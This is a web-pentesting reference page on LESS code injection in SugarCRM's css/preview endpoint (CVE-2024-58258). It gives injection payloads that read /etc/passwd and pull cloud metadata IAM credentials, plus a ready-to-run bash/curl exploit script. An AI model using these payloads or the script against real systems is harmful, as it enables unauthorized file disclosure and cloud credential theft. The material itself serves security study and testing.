less-code-injection.md (3700B)
1 --- 2 title: "LESS Code Injection leading to SSRF & Local File Read" 3 section: "Web Pentesting" 4 sectionSlug: "pentesting-web" 5 sourcePath: "src/pentesting-web/xs-search/css-injection/less-code-injection.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/xs-search/css-injection/less-code-injection.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # LESS Code Injection leading to SSRF & Local File Read 14 15 LESS is a CSS preprocessor with variables, mixins, functions, and `@import`. With the `(inline)` import option, the compiler copies the imported resource into CSS output without processing it as LESS. Server-side fetching, accepted URL schemes, and local-file access depend on the compiler implementation and options.<sup>[[4]](#references)</sup> 16 17 When an application concatenates **user-controlled input** into a string that is later parsed by the LESS compiler, an attacker can **inject arbitrary LESS code**. By abusing `@import (inline)` the attacker can force the server to retrieve: 18 19 * Local files via the `file://` protocol (information disclosure / Local File Inclusion). 20 * Remote resources on internal networks or cloud metadata services (SSRF). 21 22 This technique affected the SugarCRM `/rest/v10/css/preview` endpoint in the version ranges documented by SA-2024-059; do not reduce the advisory's edition-specific ranges to a universal “≤ 14.0.0” claim.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup> 23 24 ### Exploitation 25 26 1. Identify a parameter that is directly embedded inside a stylesheet string processed by the LESS engine (e.g. `?lm=` in SugarCRM).<sup>[[1]](#references)</sup> 27 2. Close the current statement and inject new directives. The most common primitives are: 28 * `;` – terminates the previous declaration. 29 * `}` – closes the previous block (if required). 30 3. Use `@import (inline) '<URL>';` to read arbitrary resources. 31 4. Optionally inject a **marker** (`data:` URI) after the import to ease extraction of the fetched content from the compiled CSS. 32 33 #### Local File Read 34 35 ```text 36 1; @import (inline) 'file:///etc/passwd'; 37 @import (inline) 'data:text/plain,@@END@@'; // 38 ``` 39 40 The contents of `/etc/passwd` will appear in the HTTP response just before the `@@END@@` marker. 41 42 #### SSRF – Cloud Metadata 43 44 ```text 45 1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/"; 46 @import (inline) 'data:text/plain,@@END@@'; // 47 ``` 48 49 #### Automated PoC (SugarCRM example) 50 51 ```bash 52 #!/usr/bin/env bash 53 # Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd 54 55 TARGET="$1" # Base URL of SugarCRM instance 56 RESOURCE="$2" # file:// path or URL to fetch 57 58 INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))") 59 60 curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \ 61 sed -n 's/.*@@END@@\(.*\)/\1/p' 62 ``` 63 64 ### Real-World Cases 65 66 | Product | Vulnerable Endpoint | Impact | 67 |---------|--------------------|--------| 68 | SugarCRM (affected ranges in SA-2024-059) | `/rest/v10/css/preview?lm=` | Unauthenticated SSRF and local file read | 69 70 ## References 71 72 - [1] [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04) 73 - [2] [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/) 74 - [3] [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) 75 - [4] [Less documentation — Import At-Rules](https://lesscss.org/features/#import-atrules-feature)